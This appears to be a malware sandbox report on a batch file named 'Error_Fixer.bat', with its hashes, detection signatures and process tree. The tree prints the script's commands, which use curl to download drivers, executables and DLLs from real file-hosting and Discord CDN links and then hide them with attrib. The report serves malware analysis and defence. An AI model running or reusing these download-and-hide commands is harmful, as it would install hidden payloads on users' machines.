Overview

overview

10

Static

static

10

Error_Fixer.bat

windows10-ltsc 2021-x64

8

Analysis

  • max time kernel
    11s
  • max time network
    14s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    11-11-2024 14:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Error_Fixer.bat

  • Size

    4KB

  • MD5

    0f0eeac1ee1ca486d3ba81dce6232a84

  • SHA1

    a199064741781c5a3594b0a01f4f48f1f96da459

  • SHA256

    7b58ae949a5c584d2cf3763fa0117bcbc3fddec0e080862b43c466ab5812e140

  • SHA512

    0666c250932b843bd0747812d2bf49e96e21f95eafb332108940f96eb6694cbc9753f2cfbf53c0d693798482c166499165df910c169a8a10808c21cfea3c2a54

  • SSDEEP

    96:biskkc0rjx0rwZA0rseo0refTrp0r/5VOY0rha0rIQ0reveK0roz0rdmWj0rT3DI:biskkc0rjx0rwZA0rseo0reLrp0rzOYT

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 16 IoCs
    evasion
  • cURL User-Agent 16 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Error_Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4332
    • C:\Windows\system32\curl.exe
      curl "https://files.catbox.moe/53lsww.sys" --output "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"
      2⤵
        PID:4016
      • C:\Windows\system32\attrib.exe
        attrib +h "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"
        2⤵
        • Views/modifies file attributes
        PID:3732
      • C:\Windows\system32\curl.exe
        curl "https://files.catbox.moe/2auxo6.sys" --output "C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys"
        2⤵
          PID:3660
        • C:\Windows\system32\attrib.exe
          attrib +h "C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys"
          2⤵
          • Views/modifies file attributes
          PID:4488
        • C:\Windows\system32\curl.exe
          curl "https://files.catbox.moe/2auxo6.sys" --output "C:\Users\Admin\AppData\Local\Temp\SxeaaV1X64.sys"
          2⤵
            PID:1524
          • C:\Windows\system32\attrib.exe
            attrib +h "C:\Users\Admin\AppData\Local\Temp\SxeaaV1X64.sys"
            2⤵
            • Views/modifies file attributes
            PID:1720
          • C:\Windows\system32\curl.exe
            curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816653851889674/fb4953.exe?ex=66fdd630&is=66fc84b0&hm=ddd23031710a90877555b97441d6a6c841dcefb8b5f0c8ae6934f5461224878b&" --output "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"
            2⤵
              PID:2792
            • C:\Windows\system32\attrib.exe
              attrib +h "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"
              2⤵
              • Views/modifies file attributes
              PID:3816
            • C:\Windows\system32\curl.exe
              curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816654128840816/ss2031.exe?ex=66fdd630&is=66fc84b0&hm=bee0f45ce6f1cd78183751ce16c463d257a73191aaff40c31ec35658e68942c0&" --output "C:\Users\Admin\AppData\Local\Temp\ss2031.exe"
              2⤵
                PID:3112
              • C:\Windows\system32\attrib.exe
                attrib +h "C:\Users\Admin\AppData\Local\Temp\ss2031.exe"
                2⤵
                • Views/modifies file attributes
                PID:460
              • C:\Windows\system32\curl.exe
                curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816654476841031/db3289.exe?ex=66fdd630&is=66fc84b0&hm=d9b3162be67de7afbb7005cab595210eb9b2573072607457502343127074b441&" --output "C:\Users\Admin\AppData\Local\Temp\db3289.exe"
                2⤵
                  PID:2216
                • C:\Windows\system32\attrib.exe
                  attrib +h "C:\Users\Admin\AppData\Local\Temp\db3289.exe"
                  2⤵
                  • Views/modifies file attributes
                  PID:4348
                • C:\Windows\system32\curl.exe
                  curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817450715254869/iqvsw64e.cat?ex=66fdd6ee&is=66fc856e&hm=1c4c23b3398a45f1d68ea0f2a8f8a3d12be5cd8af0c361d5be1c7dc1154705f6&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.cat"
                  2⤵
                    PID:3296
                  • C:\Windows\system32\attrib.exe
                    attrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.cat"
                    2⤵
                    • Views/modifies file attributes
                    PID:4820
                  • C:\Windows\system32\curl.exe
                    curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817451172560997/iqvsw64e.inf?ex=66fdd6ee&is=66fc856e&hm=0035d48597abcd75dde99a54e085c2fa49f97ce0808b678f10a3ddedfc60ca07&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.inf"
                    2⤵
                      PID:744
                    • C:\Windows\system32\attrib.exe
                      attrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.inf"
                      2⤵
                      • Views/modifies file attributes
                      PID:4084
                    • C:\Windows\system32\curl.exe
                      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817451725946943/iqvsw64e.sys?ex=66fdd6ee&is=66fc856e&hm=7bf1dc5baf23eb3aeebf279354f48c00b576de307a799565e6f1e155eb35428b&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.sys"
                      2⤵
                        PID:4748
                      • C:\Windows\system32\attrib.exe
                        attrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.sys"
                        2⤵
                        • Views/modifies file attributes
                        PID:3344
                      • C:\Windows\system32\curl.exe
                        curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817452082597960/eu4837.exe?ex=66fdd6ee&is=66fc856e&hm=d0521b201403836bae28b2b157bb108b0545c187508d3e25867f994bfd5cd36a&" --output "C:\Users\Admin\AppData\Local\Temp\eu4837.exe"
                        2⤵
                          PID:2244
                        • C:\Windows\system32\attrib.exe
                          attrib +h "C:\Users\Admin\AppData\Local\Temp\eu4837.exe"
                          2⤵
                          • Views/modifies file attributes
                          PID:1760
                        • C:\Windows\system32\curl.exe
                          curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817452392972338/i3782.bat?ex=66fdd6ee&is=66fc856e&hm=5ded14da6d4c18eb3c1536ec11c8a82e7f06d7adbf7f55f456361982f75aca0f&" --output "C:\Users\Admin\AppData\Local\Temp\i3782.bat"
                          2⤵
                            PID:1400
                          • C:\Windows\system32\attrib.exe
                            attrib +h "C:\Users\Admin\AppData\Local\Temp\i3782.bat"
                            2⤵
                            • Views/modifies file attributes
                            PID:408
                          • C:\Windows\system32\curl.exe
                            curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347121901571/rn3987.exe?ex=66fdd7c4&is=66fc8644&hm=d46191124bae1eacd54dc1ed2d117d1a87c76d40efdbe31c51dfe08d6af10ccf&" --output "C:\Users\Admin\AppData\Local\Temp\rn3987.exe"
                            2⤵
                              PID:2932
                            • C:\Windows\system32\attrib.exe
                              attrib +h "C:\Users\Admin\AppData\Local\Temp\rn3987.exe"
                              2⤵
                              • Views/modifies file attributes
                              PID:2556
                            • C:\Windows\system32\curl.exe
                              curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290820947791839253/RTloLib64.dll?ex=66fdda30&is=66fc88b0&hm=1ec68936e6bdc1f08b8dd9194ab515361e52dadac64ae2f0493bb633c0fe18ff&" --output "C:\Users\Admin\AppData\Local\Temp\RTIoLib64.dll"
                              2⤵
                                PID:1316
                              • C:\Windows\system32\attrib.exe
                                attrib +h "C:\Users\Admin\AppData\Local\Temp\RTIoLib64.dll"
                                2⤵
                                • Views/modifies file attributes
                                PID:1644
                              • C:\Windows\system32\curl.exe
                                curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347809640589/rtkio64.sys?ex=66fdd7c4&is=66fc8644&hm=d5740800f8fdb4026e655b1a00c7d12e7dd30937aa7c9e58714679e5fddbb4f4&" --output "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"
                                2⤵
                                  PID:3592
                                • C:\Windows\system32\attrib.exe
                                  attrib +h "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"
                                  2⤵
                                  • Views/modifies file attributes
                                  PID:3728
                                • C:\Windows\system32\curl.exe
                                  curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818348233523303/rtkiow10x64.sys?ex=66fdd7c4&is=66fc8644&hm=799739568a5ba236a008ee1cf3a9739b6b814ba7b82d4df9263e30f1505d8a43&" --output "C:\Users\Admin\AppData\Local\Temp\rtkiow10x64.sys"
                                  2⤵
                                    PID:1892
                                  • C:\Windows\system32\attrib.exe
                                    attrib +h "C:\Users\Admin\AppData\Local\Temp\rtkiow10x64.sys"
                                    2⤵
                                    • Views/modifies file attributes
                                    PID:2788
                                  • C:\Windows\system32\curl.exe
                                    curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290821109918466121/Volumeid64.exe?ex=66fdda56&is=66fc88d6&hm=f046faf7bd86b36cae97cc026dcb2dd6139cdae9109ac8d9e277e03dfc04fac7&" --output "C:\Users\Admin\AppData\Local\Temp\Volumeid64.exe"
                                    2⤵
                                      PID:3536
                                    • C:\Windows\system32\attrib.exe
                                      attrib +h "C:\Users\Admin\AppData\Local\Temp\Volumeid64.exe"
                                      2⤵
                                      • Views/modifies file attributes
                                      PID:3740

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys
                                    Filesize

                                    36KB

                                    MD5

                                    9accebd928a8926fecf317f53cd1c44e

                                    SHA1

                                    d7d71135cc3cf7320f8e63cefb6298dd44e5b1d4

                                    SHA256

                                    811e5d65df60dfb8c6e1713da708be16d9a13ef8dfcd1022d8d1dda52ed057b2

                                    SHA512

                                    2563402cc8e1402d9ac3a76a72b7dab0baa4ecd03629cc350e7199c7e1e1da4000e665bd02ac3a75fd9883fa678b924c8b73d88d8c50bf9d2ae59254a057911e

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys
                                    Filesize

                                    18KB

                                    MD5

                                    785045f8b25cd2e937ddc6b09debe01a

                                    SHA1

                                    029c678674f482ababe8bbfdb93152392457109d

                                    SHA256

                                    37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba

                                    SHA512

                                    40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\fb4953.exe
                                    Filesize

                                    36B

                                    MD5

                                    a1ca4bebcd03fafbe2b06a46a694e29a

                                    SHA1

                                    ffc88125007c23ff6711147a12f9bba9c3d197ed

                                    SHA256

                                    c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

                                    SHA512

                                    6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

                                    Download Submit